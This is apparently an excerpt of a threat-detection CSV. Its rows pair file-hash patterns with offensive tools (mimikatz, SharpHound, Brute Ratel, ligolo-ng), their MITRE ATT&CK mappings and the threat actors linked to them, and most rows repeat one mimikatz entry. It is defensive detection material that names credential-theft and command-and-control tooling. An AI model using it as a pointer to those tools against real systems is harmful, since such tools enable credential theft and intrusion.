"*51c8d89da154a0d95c49225b7fe712d8e45ecbefd0ba803ab8796c56e86a0e21*",".{0,1000}51c8d89da154a0d95c49225b7fe712d8e45ecbefd0ba803ab8796c56e86a0e21.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","26604"
"*51cd17b43ad9aa99c77827f7ce8ab9f35d78382479cba7b4e1f479e1e5b4bed1*",".{0,1000}51cd17b43ad9aa99c77827f7ce8ab9f35d78382479cba7b4e1f479e1e5b4bed1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26605"
"*51d0a19dcb5fd8dc8c8a98666bb91341a15655de2789dfa842e891f2a71aa2e9*",".{0,1000}51d0a19dcb5fd8dc8c8a98666bb91341a15655de2789dfa842e891f2a71aa2e9.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26606"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26607"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26608"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26609"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26610"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26611"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26612"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26613"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26614"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26615"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26616"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26617"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26618"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26619"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26620"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26621"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26622"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26623"
"*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26624"
